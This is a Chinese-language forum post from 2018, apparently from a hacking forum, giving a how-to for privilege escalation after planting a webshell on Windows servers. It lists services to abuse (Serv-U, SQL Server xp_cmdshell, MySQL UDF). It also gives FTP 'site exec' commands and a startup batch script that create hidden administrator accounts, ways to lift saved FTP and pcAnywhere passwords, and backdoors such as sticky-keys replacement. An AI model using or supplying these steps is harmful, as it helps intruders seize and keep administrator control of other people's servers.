提权,就是拿到webshell后,将普通用户的权限,提升为管理员的权限。
提权分为两种:
0x01: 溢出提权
0x02:第三方组件提权
一,linux提权,请查看:
http://www.nvhack.com/forum.php?mod=viewthread&tid=7292#lastpost
二,windows提权
1,windows提权时,看用户是否可执行溢出程序
asp的脚本语言依靠的是 "wscript.shell" 命令执行组件,
asp.net 脚本语言依靠的是 ".net framework"
jsp脚本语言依靠的是 ”jvm"
webshell中 执行 /c net user
/c:表示执行命令后终止
/k:执行命令后保留
/s:修改/c或/k之后的字符串处理
/Q:关闭显示
/D:禁止从注册表执行AutoRun命令
/A:使管道或文件的内部命令输出成为ANSI:
/U: 使管道或文件的内部命令输出成为Unicode。
2,第三方服务提权
serv-u :43958
sqlserver :1433,sa权限,xp_cmdshell
mysql:3306:udf提权
ftp提权:20:用于在客户端和服务器之间传输数据,21:用于传输控制流,并且是命令通向ftp服务器的进口
- ftp 172.18.199.10
- ftp> quote site exec net user temp 123456 /add
- ftp> quote site exec net localgroup administratos temp/add
filezilla提权:
flashfxp提权:Sites.dat,Stats.dat,quick.dat,这三个文件保存着历史遗留的ftp信息。下载覆盖掉,本低flashfxp,星号密码查看器查看密码
pcAnywhere 提权:5631,下载配置文件,pca.*.cif 结尾,位置:c:\...application data/sysmantec/pcanywhere/hosts中。
星外主机提权,iis.exe -i ,iis.exe -u id号,直接读密码
启动项提权:建立cmd.bat脚本,放到c:\documents and Settings\administrator\[开始]\菜单\程序\启动\中
代码如下:
- @echo off
- net user nvhack 123123 /add
- net localgroup administrators nvhack /add
dll劫持。粘滞键后门.
后门种类:
远程控制程序,服务管理账号后门,克隆账户,administrator账户密码,线程插入后门,web后门。
|
发表于 2018-10-1 10:52:03
